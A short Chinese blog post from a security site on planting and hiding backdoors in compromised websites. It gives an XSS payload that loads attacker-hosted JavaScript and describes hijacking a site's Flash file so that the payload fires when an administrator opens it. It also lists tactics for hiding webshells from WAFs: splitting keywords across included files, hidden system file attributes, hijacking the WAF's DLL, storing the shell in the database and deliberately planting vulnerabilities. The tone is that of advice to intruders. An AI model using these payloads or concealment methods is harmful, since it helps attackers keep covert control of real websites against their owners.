蜗蜗侠's Blog-关注网络安全移动版

主页 > 技术笔记 >

XSS后门的使用及隐藏

前言  其实呢,这个星期我发帖子的任务已经完成了。但是想到之前,好久一阵子有事情,没发什么帖子。感觉有点对不起蛋蛋。所以特来补贴!

0x00 后门程序
           后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的 安全认证而对系统有安全存取权。例如一个login程序,当你输入特定的密码时,你就能以管理员的权限来存取系统。     --转载至百度百科

0x01 后门的使用及隐藏
           一. XSS后门的使用及隐藏
                  XSS后门的简介:XSS后门大都是在程序在没有突破口时,进行盲打或拿下后台时,怕管理员改掉密码而无法进入所留下的后门。
                  XSS后门的编写:很多时候,我们都会使用XSS进行攻击。而且语句基本都是<script href=你的js地址'></script><img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>这种情况,一般管理员都见怪不怪了。很轻易的就找到了我们的后门,并删除了。那。。。有什么更好的方式留下后门吗?答案是,当然。我们可以劫持网站上原本的FLASH来进行后门的植入。我们只需要在FLASH中加入以下语句。(请注意要讲原来的FLASH加载进去哦~)

                   当我们植入我们的XSS后门之后,网站管理员只要一打开就会上钩啦~当然,这种情况也是有弊端的!随着浏览器的安全性能越来越高,这种情况时不会被执行 的。(老一点的版本可以哦)那我们要怎么做呢?很简单,大家eval一句话应该都熟悉吧?JavaScript也存在eval这个函数呢!动动你们的脑 子!
          二.shell的隐藏
               一句话短小而又精湛,不容易被发现。但是,自从有了WAF,那是各种扫描啊!真tm不知道往哪里藏。下面就说下我自己藏shell的思路吧。
                     1.拆分关键字,采用多文件包含的方式隐藏。
                     2.设置文件属性为隐藏+系统文件
                     3.劫持WAF的DLL进行死循环写出。(这事我最爱干)
                     4.将真正的一句话写入数据库。(过WAF妥妥的)
                     5.制造程序漏洞。(有编程功底的自己制造漏洞当后门啊!)


0x02 结束语
                  
                                                                               By:傀儡 (责任编辑:蜗蜗侠)